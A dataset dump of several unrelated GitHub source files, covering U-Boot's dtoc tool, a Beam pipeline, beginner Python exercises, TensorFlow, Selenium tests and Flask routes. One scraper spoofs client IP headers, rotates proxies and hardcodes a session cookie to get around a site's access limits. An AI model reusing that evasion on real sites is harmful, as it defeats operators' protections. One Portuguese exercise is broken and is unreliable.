self.out('#include \\n')\n self.out('#include \\n')\n self.out('#include \\n')\n self.out('\\n')\n\n if self._valid_nodes:\n self.out('/*\\n')\n self.out(\n \" * driver_info declarations, ordered by 'struct driver_info' linker_list idx:\\n\")\n self.out(' *\\n')\n self.out(' * idx %-20s %-s\\n' % ('driver_info', 'driver'))\n self.out(' * --- %-20s %-s\\n' % ('-' * 20, '-' * 20))\n for node in self._valid_nodes:\n self.out(' * %3d: %-20s %-s\\n' %\n (node.idx, node.var_name, node.struct_name))\n self.out(' * --- %-20s %-s\\n' % ('-' * 20, '-' * 20))\n self.out(' */\\n')\n self.out('\\n')\n\n for node in self._valid_nodes:\n self.output_node_plat(node)\n\n self.out(''.join(self.get_buf()))\n\n def generate_device(self):\n \"\"\"Generate device instances\n\n This writes out DM_DEVICE_INST() records for each device in the\n build.\n\n See the documentation in doc/driver-model/of-plat.rst for more\n information.\n \"\"\"\n self.out('#include \\n')\n self.out('#include \\n')\n self.out('#include \\n')\n self.out('\\n')\n\n if self._valid_nodes:\n self.out('/*\\n')\n self.out(\n \" * udevice declarations, ordered by 'struct udevice' linker_list position:\\n\")\n self.out(' *\\n')\n self.out(' * idx %-20s %-s\\n' % ('udevice', 'driver'))\n self.out(' * --- %-20s %-s\\n' % ('-' * 20, '-' * 20))\n for node in self._valid_nodes:\n self.out(' * %3d: %-20s %-s\\n' %\n (node.idx, node.var_name, node.struct_name))\n self.out(' * --- %-20s %-s\\n' % ('-' * 20, '-' * 20))\n self.out(' */\\n')\n self.out('\\n')\n\n for node in self._valid_nodes:\n self.output_node_instance(node)\n\n self.out(''.join(self.get_buf()))\n\n\n# Types of output file we understand\n# key: Command used to generate this file\n# value: OutputFile for this command\nOUTPUT_FILES_COMMON = {\n 'decl':\n OutputFile(Ftype.HEADER, 'dt-decl.h', DtbPlatdata.generate_decl,\n 'Declares externs for all device/uclass instances'),\n 'struct':\n OutputFile(Ftype.HEADER, 'dt-structs-gen.h',\n DtbPlatdata.generate_structs,\n 'Defines the structs used to hold devicetree data'),\n }\n\n# File generated without instantiate\nOUTPUT_FILES_NOINST = {\n 'platdata':\n OutputFile(Ftype.SOURCE, 'dt-plat.c', DtbPlatdata.generate_plat,\n 'Declares the U_BOOT_DRIVER() records and platform data'),\n }\n\n# File generated with instantiate\nOUTPUT_FILES_INST = {\n 'device':\n OutputFile(Ftype.SOURCE, 'dt-device.c', DtbPlatdata.generate_device,\n 'Declares the DM_DEVICE_INST() records'),\n 'uclass':\n OutputFile(Ftype.SOURCE, 'dt-uclass.c', DtbPlatdata.generate_uclasses,\n 'Declares the uclass instances (struct uclass)'),\n }\n\n\ndef run_steps(args, dtb_file, include_disabled, output, output_dirs, phase,\n instantiate, warning_disabled=False, drivers_additional=None,\n basedir=None, scan=None):\n \"\"\"Run all the steps of the dtoc tool\n\n Args:\n args (list): List of non-option arguments provided to the problem\n dtb_file (str): Filename of dtb file to process\n include_disabled (bool): True to include disabled nodes\n output (str): Name of output file (None for stdout)\n output_dirs (tuple of str):\n Directory to put C output files\n Directory to put H output files\n phase: The phase of U-Boot that we are generating data for, e.g. 'spl'\n or 'tpl'. None if not known\n instantiate: Instantiate devices so they don't need to be bound at\n run-time\n warning_disabled (bool): True to avoid showing warnings about missing\n drivers\n drivers_additional (list): List of additional drivers to use during\n scanning\n basedir (str): Base directory of U-Boot source code. Defaults to the\n grandparent of this file's directory\n scan (src_src.Scanner): Scanner from a previous run. This can help speed\n up tests. Use None for normal operation\n\n Returns:\n DtbPlatdata object\n\n Raises:\n ValueError: if args has no command, or an unknown command\n \"\"\"\n if not args:\n raise ValueError('Please specify a command: struct, platdata, all')\n if output and output_dirs and any(output_dirs):\n raise ValueError('Must specify either output or output_dirs, not both')\n\n if not scan:\n scan = src_scan.Scanner(basedir, drivers_additional, phase)\n scan.scan_drivers()\n do_process = True\n else:\n do_process = False\n plat = DtbPlatdata(scan, dtb_file, include_disabled, instantiate)\n plat.scan_dtb()\n plat.scan_tree(add_root=instantiate)\n plat.prepare_nodes()\n plat.scan_reg_sizes()\n plat.setup_output_dirs(output_dirs)\n plat.scan_structs()\n plat.scan_phandles()\n plat.process_nodes(instantiate)\n plat.read_aliases()\n plat.assign_seqs()\n\n # Figure out what output files we plan to generate\n output_files = dict(OUTPUT_FILES_COMMON)\n if instantiate:\n output_files.update(OUTPUT_FILES_INST)\n else:\n output_files.update(OUTPUT_FILES_NOINST)\n\n cmds = args[0].split(',')\n if 'all' in cmds:\n cmds = sorted(output_files.keys())\n for cmd in cmds:\n outfile = output_files.get(cmd)\n if not outfile:\n raise ValueError(\"Unknown command '%s': (use: %s)\" %\n (cmd, ', '.join(sorted(output_files.keys()))))\n plat.setup_output(outfile.ftype,\n outfile.fname if output_dirs else output)\n plat.out_header(outfile)\n outfile.method(plat)\n plat.finish_output()\n\n if not warning_disabled:\n scan.show_warnings()\n return plat\n","repo_name":"u-boot/u-boot","sub_path":"tools/dtoc/dtb_platdata.py","file_name":"dtb_platdata.py","file_ext":"py","file_size_in_byte":46969,"program_lang":"python","lang":"en","doc_type":"code","stars":3245,"dataset":"github-code","pt":"48"} +{"seq_id":"17112315195","text":"from __future__ import absolute_import\n\nimport argparse\nimport json\nimport logging\n\nimport apache_beam as beam\nfrom apache_beam.io.gcp.internal.clients import bigquery\n\n\ndef create_set(values):\n res = set()\n for elt in values:\n if elt is not None and not elt == set([None]):\n res = res.union(elt)\n return res\n\ndef mf1(k_v):\n return {'from_name': k_v[0], 'emails': list(k_v[1]) if k_v[1] else []}\n\n\ndef mf2(k_v):\n return {'from_email': k_v[0], 'names': list(k_v[1]) if k_v[1] else []}\n\n\ndef get_emails(input_data):\n \"\"\"...\"\"\"\n return (\n input_data\n | 'emails per name' >> beam.FlatMap(\n lambda row: [(row['from_name'], set([row['from_email']]))] if row['from_name'] and '@' in row['from_email'] else [])\n | 'name emails' >> beam.CombinePerKey(create_set)\n | 'format1' >>\n beam.Map(mf1)\n # beam.Map(lambda k_v: {\n # 'from_name': k_v[0], 'emails': list(k_v[1]) if k_v[1] else []\n # })\n )\n\ndef get_names(input_data):\n \"\"\"...\"\"\"\n return (\n input_data\n | 'names per email' >> beam.FlatMap(\n lambda row: [(row['from_email'], set([row['from_name']]))] if row['from_email'] and '@' in row['from_email'] else [])\n | 'email names' >> beam.CombinePerKey(create_set)\n | 'format2' >>\n beam.Map(mf2)\n # beam.Map(lambda k_v: {\n # 'from_email': k_v[0], 'names': list(k_v[1]) if k_v[1] else []\n # })\n )\n\ndef run(argv=None):\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--input',\n default='aju-vtests2:mail_archives.ingestion_test',\n help=(\n 'Input BigQuery table to process specified as: '\n 'PROJECT:DATASET.TABLE or DATASET.TABLE.'))\n parser.add_argument(\n '--output1',\n required=True,\n help=(\n 'Output BigQuery table for results specified as: '\n 'PROJECT:DATASET.TABLE or DATASET.TABLE.'))\n parser.add_argument(\n '--output2',\n required=True,\n help=(\n 'Output BigQuery table for results specified as: '\n 'PROJECT:DATASET.TABLE or DATASET.TABLE.'))\n\n parser.add_argument(\n '--gcs_location',\n required=False,\n help=('GCS Location to store files to load '\n 'data into Bigquery'))\n\n known_args, pipeline_args = parser.parse_known_args(argv)\n table_schema1 = bigquery.TableSchema()\n field_schema = bigquery.TableFieldSchema()\n field_schema.name = 'from_name'\n field_schema.type = 'string'\n field_schema.mode = 'required'\n table_schema1.fields.append(field_schema)\n # repeated field\n field_schema = bigquery.TableFieldSchema()\n field_schema.name = 'emails'\n field_schema.type = 'string'\n field_schema.mode = 'repeated'\n table_schema1.fields.append(field_schema)\n\n table_schema2 = bigquery.TableSchema()\n field_schema = bigquery.TableFieldSchema()\n field_schema.name = 'from_email'\n field_schema.type = 'string'\n field_schema.mode = 'required'\n table_schema2.fields.append(field_schema)\n # repeated field\n field_schema = bigquery.TableFieldSchema()\n field_schema.name = 'names'\n field_schema.type = 'string'\n field_schema.mode = 'repeated'\n table_schema2.fields.append(field_schema)\n\n with beam.Pipeline(argv=pipeline_args) as p:\n\n # Read the table rows into a PCollection.\n rows = p | 'read' >> beam.io.ReadFromBigQuery(table=known_args.input)\n emails_per_name = get_emails(rows)\n names_per_email = get_names(rows)\n\n # Write the output using a \"Write\" transform that has side effects.\n # pylint: disable=expression-not-assigned\n emails_per_name | 'Write1' >> beam.io.WriteToBigQuery(\n known_args.output1,\n # schema='from_name:STRING, emails:STRING',\n schema = table_schema1,\n create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,\n write_disposition=beam.io.BigQueryDisposition.WRITE_TRUNCATE)\n\n names_per_email | 'Write2' >> beam.io.WriteToBigQuery(\n known_args.output2,\n schema = table_schema2,\n create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,\n write_disposition=beam.io.BigQueryDisposition.WRITE_TRUNCATE)\n\n # Run the pipeline (all operations are deferred until run() is called).\n\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n run()\n\n# example invocation. If output tables of the same name already exist, they will be dropped\n# and overwritten. You can use the 'DirectRunner' also, if you set\n# GOOGLE_APPLICATION_CREDENTIALS locally.\n# python names_emails.py \\\n# --region $REGION \\\n# --input '[PROJECT ID]:mail_archives.names_emails' \\\n# --output1 '[PROJECT ID]:mail_archives.emails_name_test2' \\\n# --output2 '[PROJECT ID]:mail_archives.names_email_test2' \\\n# --runner DataflowRunner \\\n# --project $PROJECT \\\n# --temp_location gs://$BUCKET/tmp/\n","repo_name":"google/project-OCEAN","sub_path":"archive/mailing-list-data-pipelines/2-transform-data/manual_bq_ingest/dataflow/dataflow_names_emails.py","file_name":"dataflow_names_emails.py","file_ext":"py","file_size_in_byte":4791,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"48"} +{"seq_id":"71739798866","text":"lista = []\r\nsomapar = []\r\nsomaimpar = []\r\ncontador = 0\r\n\r\nfor contador in range(6):\r\n numeros= int(input(f\"Adicione o {contador + 1}º número inteiro e positivo: \"))\r\n if numeros == 0:\r\n print(\"não digite 0\")\r\n else:\r\n while numero !=0:\r\n contador = contador + 1\r\n lista.append(numeros)\r\n if numeros %2 == 0:\r\n somapar.append(numeros)\r\n else:\r\n somaimpar.append(numeros)\r\n\r\nprint(f\"A lista original\\n{lista}\")\r\nprint(f\"A lista dos pares: {somapar}\\nsoma dos pares: {sum(somapar)}\")\r\nprint(f\"A lista dos impares: {somaimpar}\\nsoma dos impares: {sum(somaimpar)}\")\r\n\r\n#Precisa validar a condição de ser positivo!","repo_name":"allansmar/Estudos-Python","sub_path":"listas_desafio3.py","file_name":"listas_desafio3.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41040419184","text":"# -*- coding=utf-8 -*-\nfrom time import sleep\n\nimport re\nimport requests\nimport scrapy\nfrom scrapy.spiders import Spider\nfrom ..items import ZhiWangItem, _DBConf\nfrom scrapy.exceptions import CloseSpider\nfrom bs4 import BeautifulSoup\nfrom .commonFn import initSpider,getProxy,randomIP\nimport json\nfrom redis import Redis\nimport threading\n\nthreadCount = 0\nisGoon = True\nmyLock = threading.RLock()\n\n\nclass CourseSpider(Spider):\n name = \"WanFang\"\n allowed_domains = [\"shuxiavip.com\"]\n start_urls = [\n 'http://www.shuxiavip.com/course.html'\n ]\n # 每次开始执行抓取,都将之前的数据清空\n i = 0\n\n def __init__(self, storeConf=json.dumps(_DBConf), limit_count=0, trash_data=False, *a, **kw):\n # 获取数据库配置\n super().__init__(*a, **kw)\n self.collection = initSpider(self,trash_data=trash_data,limit_count=limit_count,storeConf=storeConf)\n self.limit_count = limit_count\n self.r = Redis(db=1)\n self.cookie = {\n 'cookie': \"SERVERID=958b97eacbe3c49360ace2dfc0bd31b4|1507717368|1507713772\",\n }\n self.headers = {\n 'accept': \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n 'accept-encoding': \"gzip, deflate\",\n 'accept-language': \"zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4\",\n 'cache-control': \"no-cache\",\n 'connection': \"keep-alive\",\n 'cookie': \"Hm_lvt_f5e6bd27352a71a202024e821056162b=1507729920; Hm_lpvt_f5e6bd27352a71a202024e821056162b=1507729989; WFKS.Auth=%7b%22Context%22%3a%7b%22AccountIds%22%3a%5b%5d%2c%22Data%22%3a%5b%5d%2c%22SessionId%22%3a%228e180150-d977-47e5-8435-96e76595ec9e%22%2c%22Sign%22%3a%22hi+authserv%22%7d%2c%22LastUpdate%22%3a%222017-10-11T13%3a59%3a36Z%22%2c%22TicketSign%22%3a%22uH%2bEBqcg0n1NXO48V9NQPg%3d%3d%22%7d\",\n 'host': \"s.wanfangdata.com.cn\",\n 'upgrade-insecure-requests': \"1\",\n 'user-agent': \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\"\n }\n self.DetailHeaders = {\n \"X-Forwarded-For\":randomIP(),\n \"X-Real-IP\":randomIP()\n }\n\n\n def requestsUrl(self,num):\n url = \"http://s.wanfangdata.com.cn/Paper.aspx\"\n global threadCount,isGoon\n myLock.acquire()\n print(u\"Start Requests:\"+str(num))\n querystring = {\"q\":\"成人教育\",\"f\":\"top\",\"p\":str(num)}\n myLock.release()\n try:\n response = requests.request(\"GET\", url, headers=self.headers, params=querystring,timeout=20)\n if response.status_code == 200:\n html = BeautifulSoup(response.content,'lxml')\n recordItems = html.find_all(\"div\",{\"class\":\"record-item\"})\n if len(recordItems) > 0:\n #对于一个页面的所有详情,我们使用一个固定的代理去请求,避免过多的请求代理服务\n proxies = getProxy()\n #获取代理成功\n print(proxies[\"http\"])\n for item in recordItems:\n #解析数据,请求详\n try:\n res = requests.request(\"GET\",item.find(\"a\",{\"class\":\"title\"}).get(\"href\"),headers=self.DetailHeaders,timeout=40,proxies=proxies)\n if res.status_code == 200:\n Dhtml = BeautifulSoup(res.text,'lxml')\n baseInfo = Dhtml.find(\"div\",{\"class\":\"section-baseinfo\"})\n ScItem = ZhiWangItem()\n ScItem[\"sourceType\"] = \"万方\"\n ScItem[\"college\"] = \"WanFang\"\n ScItem[\"hotValue\"] = 0\n ScItem[\"downloadNum\"] = 0\n if baseInfo:\n ScItem[\"title\"] = baseInfo.find(\"h1\").text\n ScItem[\"html\"] = baseInfo.find(\"div\",{\"class\":\"text\"}).text\n ScItem[\"url\"] = res.url\n else:\n continue\n filedInfo = Dhtml.find(\"div\",{\"class\":\"fixed-width baseinfo-feild\"})\n if filedInfo:\n tagsA = filedInfo.find(\"div\",{\"class\":\"row row-keyword\"})\n if tagsA:\n tagsA = tagsA.find_all(\"a\")\n else:\n tagsA = []\n tempTag = []\n for tag in tagsA:\n tempTag.append(tag.text)\n ScItem[\"tags\"] = tempTag\n ScItem[\"cateTag\"] = \"\"\n else:\n continue\n #获取完成,返回item\n self.saveToMongodb(ScItem)\n else:\n #请求详情失败,直接跳过\n print(\"Detail Info Requests Field:\")\n continue\n except Exception as e:\n print(\"Process Detail Info Error: \" + str(e))\n continue\n #请求完成了\n print(\"Detail Info Requests Complete!! ThreadCount --\")\n threadCount = threadCount - 1\n else:\n #获取列表失败了\n print(\"List Count empty\")\n threadCount = threadCount - 1\n else:\n #请求失败的考虑重新加入到队列中\n print(u\"Requests Field\")\n print(response.text)\n print(response.status_code)\n threadCount = threadCount - 1\n except Exception as e:\n print(str(e))\n threadCount = threadCount - 1\n print(u\"Requests Error\")\n\n def parse(self,response):\n global threadCount,isGoon\n num = 1107\n while(isGoon):\n if num > 6292:\n isGoon = False\n else:\n if threadCount < 4:\n t = threading.Thread(target=self.requestsUrl, name = \"Name: \"+str(num),args=(num,))\n threadCount += 1\n num += 1\n t.start()\n\n def filterStr(self,str):\n r = u'[0-9!\"#$%&\\'();\\ ()*+-/:;<=>?@,\\\\ \\\\ \\\\r\\\\t\\\\n\\\\:。?★、…【】《》?“”‘’![\\\\]^_`{|}~]+'\n return re.sub(r, '', str)\n\n def saveToMongodb(self,item):\n from bson import ObjectId\n item[\"_id\"] = ObjectId()\n item[\"html\"] = self.filterStr(item[\"html\"])\n item[\"title\"] = self.filterStr(item[\"title\"])\n self.collection.insert(item)","repo_name":"pxz000git/Spider","sub_path":"shouScrapyZH/shouSpiders/spiders/WanFang.py","file_name":"WanFang.py","file_ext":"py","file_size_in_byte":7129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71286310227","text":"import tensorflow as tf\nimport numpy as np\n\nx = np.random.random([100])\ny = 0.3 * x + 0.1\n\n\nW = tf.Variable(tf.zeros([1]), dtype=tf.float32)\nb = tf.Variable(tf.zeros([1]),dtype=tf.float32)\nInput_x = tf.placeholder(tf.float32)\nInput_y = tf.placeholder(tf.float32)\n\ny_pred = W * Input_x + b\n\nloss = tf.reduce_mean(tf.square(Input_y - y_pred))\noptimizer = tf.train.GradientDescentOptimizer(0.1).minimize(loss)\n\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for epoch in range(500):\n sess.run(optimizer, feed_dict={Input_x:x, Input_y:y})\n #这儿的一定要注意,因为loss不仅仅是一个变量,它是由Input_x和Input_y计算出来的,所以在���算loss的时候也需要将具体的数据传入进去\n print('epoch:', epoch, 'loss:', sess.run(loss, feed_dict={Input_x:x, Input_y:y}), 'W', sess.run(W), 'b', sess.run(b))\n","repo_name":"DecstionBack/tensorflow-exercise","sub_path":"linear_simple.py","file_name":"linear_simple.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74847597904","text":"import csv\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\nimport re\n\n\n# Функция для группировки файлов по числам в названиях\ndef group_files_by_number(data):\n file_groups = defaultdict(lambda: {\"not_black_hole\": [], \"black_hole\": []})\n\n for row in data:\n file_name, sender_receiver_id, packet_count = row\n number = int(re.search(r'\\d+', file_name).group())\n\n if \"not_black_hole\" in file_name:\n file_groups[number][\"not_black_hole\"].append((sender_receiver_id, int(packet_count)))\n elif \"black_hole\" in file_name:\n file_groups[number][\"black_hole\"].append((sender_receiver_id, int(packet_count)))\n\n return file_groups\n\n\n# Чтение данных из CSV-файла\nfilename = \"results.csv\"\nwith open(filename, newline='', encoding=\"utf-8\") as csvfile:\n reader = csv.reader(csvfile, delimiter=\",\", quotechar='\"')\n data = [row for row in reader]\n\nfile_groups = group_files_by_number(data)\n\n# Построение и отображение объединенных графиков с двумя столбцами разных цветов\nfor number, file_group in file_groups.items():\n fig, ax = plt.subplots(figsize=(16, 10))\n width = 0.4\n offset = width\n\n all_sender_receiver_ids = set()\n for j, (file_type, file_data) in enumerate(file_group.items()):\n if file_data:\n sender_receiver_ids, packet_counts = zip(*file_data)\n all_sender_receiver_ids.update(sender_receiver_ids)\n all_sender_receiver_ids = sorted(list(all_sender_receiver_ids))\n\n for j, (file_type, file_data) in enumerate(file_group.items()):\n if file_data:\n sender_receiver_ids, packet_counts = zip(*file_data)\n d = {}\n for k in range(len(sender_receiver_ids)):\n d[sender_receiver_ids[k]] = packet_counts[k]\n for s in all_sender_receiver_ids:\n if s not in d.keys():\n d[s] = 0\n pc = [d[s] for s in all_sender_receiver_ids]\n x = [i + (j * offset) for i in range(len(all_sender_receiver_ids))]\n #print(f\"{sender_receiver_ids} - {packet_counts}\")\n ax.bar(x, pc, width=width, alpha=0.6, label=file_type.capitalize())\n\n\n ax.set_title(f'Сравнение файлов not_black_hole-{number}-0.pcap и black_hole-{number}-0.pcap', fontsize=12)\n ax.set_xlabel(\"IР отправителя и получателя\", fontsize=10)\n ax.set_ylabel(\"Количество пакетов\", fontsize=10)\n ax.set_xticks([i + width / 2 for i in range(len(all_sender_receiver_ids))])\n ax.set_xticklabels(all_sender_receiver_ids, rotation=10, fontsize=8)\n ax.tick_params(axis='y', labelsize=8)\n ax.legend()\n\n plt.show()\n\n","repo_name":"LMN993/AnomaliesIdentifying","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"39605043324","text":"time = []\njogador = {}\ngols = []\nwhile True:\n jogador.clear()\n jogador['nome'] = str(input('Nome jogador: '))\n partidas = int(input(f'Quantas partidas {jogador[\"nome\"]} jogou? '))\n gols.clear()\n for contador in range(0, partidas):\n gols.append(int(input(f'Quantos gols na partida {contador+1}? ')))\n jogador['gols'] = gols[:]\n jogador['total'] = sum(gols)\n time.append(jogador.copy())\n while True:\n opcao = str(input('Deseja continuar ? [S/N] ')).upper().strip()[0]\n if opcao in 'SN':\n break\n print('ERRO ! Digite apenas S ou N.')\n if opcao in 'N':\n break\nprint('=-'*20)\nprint('ID ', end='')\nfor i in jogador.keys():\n print(f'{i:<15} ', end='')\nprint()\nprint('=-'*20)\nfor keys, valores in enumerate(time):\n print(f'{keys:>3} ', end='')\n for dados in valores.values():\n print(f'{str(dados):<15}', end='')\n print()\nprint('=-'*20)\nwhile True:\n busca = int(input('Buscar jogador pela ID? [999 finaliza] '))\n if busca == 999:\n break\n if busca >= len(time):\n print(f'Não existe jogador com ID {busca}')\n else:\n print(f' --- LEVANTAMENTO DO JOGADOR {time[busca][\"nome\"]} ---')\n for indice, gol in enumerate(time[busca][\"gols\"]):\n print(f' No jogo {indice+1} fez {gol} gols.')\n print('=-' * 20)\nprint('Programa finalizado')","repo_name":"takamuio/DesafiosAulaYoutube","sub_path":"venv/teste95.py","file_name":"teste95.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2463306789","text":"from os import chdir, listdir\n\nfrom os.path import isfile\n\ncaminho = \"\"\n\nchdir(caminho)\n\nlista = []\n\nfor arquivo in listdir():\n if isfile(arquivo):\n with open(f\"{arquivo}\", \"r\") as content:\n linha = content.readlines()\n ultima_linha = linha[len(linha) - 1]\n lista.append(ultima_linha)\n\nwith open(\"c:/users/ricardo/download/juntaultimaslinhas/novo.txt\", \"w\") as f:\n for linha in lista:\n f.write(str(linha) + \"\\n\") ","repo_name":"rick21arce/Python","sub_path":"read_many_csvs_last_line.py","file_name":"read_many_csvs_last_line.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5508768704","text":"from datetime import datetime\nimport time\n\nimport pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\n\nfrom TestData.HomePageData import HomePageData\nfrom utilities.BaseClass import BaseClass\nfrom PageObjects.HomePage import HomePage\n\n\nclass TestE2Eone(BaseClass):\n\n\n def test_formsubmission(self, getData,setup):\n log = self.getLogger()\n\n homepage = HomePage(self.driver)\n log.info(\"Opened the URL\")\n homepage.entername().send_keys(getData[\"name\"])\n log.info(\"Entered name: \"+ getData[\"name\"])\n homepage.entermail().send_keys(getData[\"mail\"])\n log.info(\"Entered mail: \"+ getData[\"mail\"])\n homepage.enterpasswd().send_keys(getData[\"password\"])\n log.info(\"Entered Password: \"+ getData[\"password\"])\n homepage.selchkbox().click()\n log.info(\"Selected the Checkbox\")\n self.selOptionByTxt(homepage.selddoption(), getData[\"gender\"])\n log.info(\"Selected the gender as \"+ getData[\"gender\"])\n homepage.selsubmitbtn().click()\n log.info(\"Submitted the form\")\n homepage.getalertmsg(\"Success\")\n self.driver.refresh()\n\n def test_e2e(self, setup):\n log = self.getLogger()\n self.driver.implicitly_wait(10)\n\n homepage = HomePage(self.driver)\n checkoutpage = homepage.shopItems(\"Blackberry\")\n log.info(\"Getting the Card Titles\")\n checkoutpage.getappcard().click()\n log.info(\"Selected the required Mobile\")\n checkoutpage.getshpcheckoutbtn().click()\n log.info(\"Moving to Card Checkout page\")\n purchasepage = checkoutpage.getfnlcheckoutbtn()\n purchasepage.entercountry().send_keys(\"ind\")\n self.verifyLinkPresence(\"India\")\n purchasepage.selectcountry().click()\n log.info(\"Selected the country\")\n purchasepage.selectchkbox().click()\n purchasepage.selectsubmit().click()\n log.info(\"Submitted the Purchasing successfully\")\n purchasepage.chksuccess(\"Success\")\n\n @pytest.fixture(params=HomePageData.getTestData(\"Test2\"))\n def getData(self, request):\n return request.param","repo_name":"ssrrajan/pyseldemoframework","sub_path":"tests/test_e2e.py","file_name":"test_e2e.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12106211661","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nfrom flask import (Blueprint, render_template, request, flash, redirect, url_for)\nfrom forms import *\nfrom sqlalchemy import func\nfrom datetime import datetime\nfrom models import *\n\nartist_page = Blueprint('artist_page', __name__, template_folder='templates')\n\n# Artists\n# ----------------------------------------------------------------\n@artist_page.route('/artists')\ndef artists():\n \n artistdata = db.session.query(Artist.id, Artist.name).all()\n data = []\n for artist in artistdata:\n data.append({\"id\": artist.id, \"name\": artist.name})\n \n return render_template('pages/artists.html', artists=data)\n\n@artist_page.route('/artists/search', methods=['POST'])\ndef search_artists():\n\n search_term = request.form.get('search_term')\n if(',' in search_term) :\n n_search = search_term.split(',')\n artists = db.session.query(Artist.id, Artist.name).filter(Artist.city == n_search[0].strip()).filter(Artist.state == n_search[1].strip()).all();\n else :\n artists = db.session.query(Artist.id, Artist.name).filter(Artist.name.ilike('%'+search_term+'%')).all();\n\n data = []\n for artist in artists:\n upcomingshows = db.session.query(func.count(Shows.artist_id).label(\"tot\")).filter(Shows.artist_id == artist.id).filter(Shows.start_time > datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")).one()\n data.append({\"id\": artist.id, \"name\": artist.name, \"num_upcoming_shows\": upcomingshows.tot})\n \n response = {\"count\": len(artists), \"data\": data}\n \n return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\n\n@artist_page.route('/artists/')\ndef show_artist(artist_id):\n\n artistdata = db.session.query(Artist.id, Artist.name, Artist.genres, Artist.city, Artist.state, \n Artist.phone, Artist.website_link, Artist.facebook_link, Artist.seeking_venue, \n Artist.seeking_description, Artist.image_link).filter(Artist.id == artist_id).one()\n \n pastshows = db.session.query(Shows.venue_id, Shows.start_time,\n Venue.name.label(\"venue_name\"), \n Venue.image_link.label(\"venue_image_link\")\n ).join(Venue, Shows.venue_id == Venue.id).join(Artist, Shows.artist_id == Artist.id\n ).filter(Shows.artist_id == artist_id).filter(Shows.start_time < datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")).all()\n\n upcomingshows = db.session.query(Shows.venue_id, Shows.start_time,\n Venue.name.label(\"venue_name\"), \n Venue.image_link.label(\"venue_image_link\")\n ).join(Venue, Shows.venue_id == Venue.id).join(Artist, Shows.artist_id == Artist.id\n ).filter(Shows.artist_id == artist_id).filter(Shows.start_time > datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")).all()\n \n\n data = {\n \"id\": artistdata.id,\n \"name\": artistdata.name,\n \"genres\": artistdata.genres.replace(\"{\", \"\").replace(\"}\", \"\").split(','),\n \"city\": artistdata.city,\n \"state\": artistdata.state,\n \"phone\": artistdata.phone,\n \"website\": artistdata.website_link,\n \"facebook_link\": artistdata.facebook_link,\n \"seeking_venue\": artistdata.seeking_venue,\n \"seeking_description\": artistdata.seeking_description,\n \"image_link\": artistdata.image_link,\n \"past_shows_count\": len(pastshows),\n \"upcoming_shows_count\": len(upcomingshows)\n }\n\n data[\"past_shows\"] = []\n for shows in pastshows:\n psh = {\"venue_id\": shows.venue_id, \"venue_name\": shows.venue_name, \"venue_image_link\": shows.venue_image_link, \"start_time\": shows.start_time}\n data[\"past_shows\"].append(psh)\n\n data[\"upcoming_shows\"] = []\n for shows in upcomingshows:\n ush = {\"venue_id\": shows.venue_id, \"venue_name\": shows.venue_name, \"venue_image_link\": shows.venue_image_link, \"start_time\": shows.start_time}\n data[\"upcoming_shows\"].append(ush)\n\n \n return render_template('pages/show_artist.html', artist=data)\n\n# Update\n# ----------------------------------------------------------------\n@artist_page.route('/artists//edit', methods=['GET'])\ndef edit_artist(artist_id):\n\n form = ArtistForm()\n artist = Artist.query.get(artist_id)\n \n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@artist_page.route('/artists//edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n\n form = ArtistForm(request.form)\n try:\n artist = Artist.query.get(artist_id)\n form.populate_obj(artist)\n db.session.commit()\n flash('Artist ' + request.form['name'] + ' was successfully updated!')\n except ValueError as e:\n print(e)\n flash('An error occurred. Artist ' + request.form['name'] + ' could not be updated.')\n db.session.rollback()\n finally:\n db.session.close()\n\n return redirect(url_for('artist_page.show_artist', artist_id=artist_id))\n\n\n# Create Artist\n# ----------------------------------------------------------------\n\n@artist_page.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@artist_page.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n\n form = ArtistForm(request.form)\n try:\n artist = Artist()\n form.populate_obj(artist)\n db.session.add(artist)\n db.session.commit()\n flash('Artist ' + request.form['name'] + ' was successfully listed!')\n except ValueError as e:\n print(e)\n flash('An error occurred. Artist ' + request.form['name'] + ' could not be listed.')\n db.session.rollback()\n finally:\n db.session.close()\n\n \n # e.g., flash('An error occurred. Artist ' + data.name + ' could not be listed.')\n #return render_template('pages/home.html')\n return 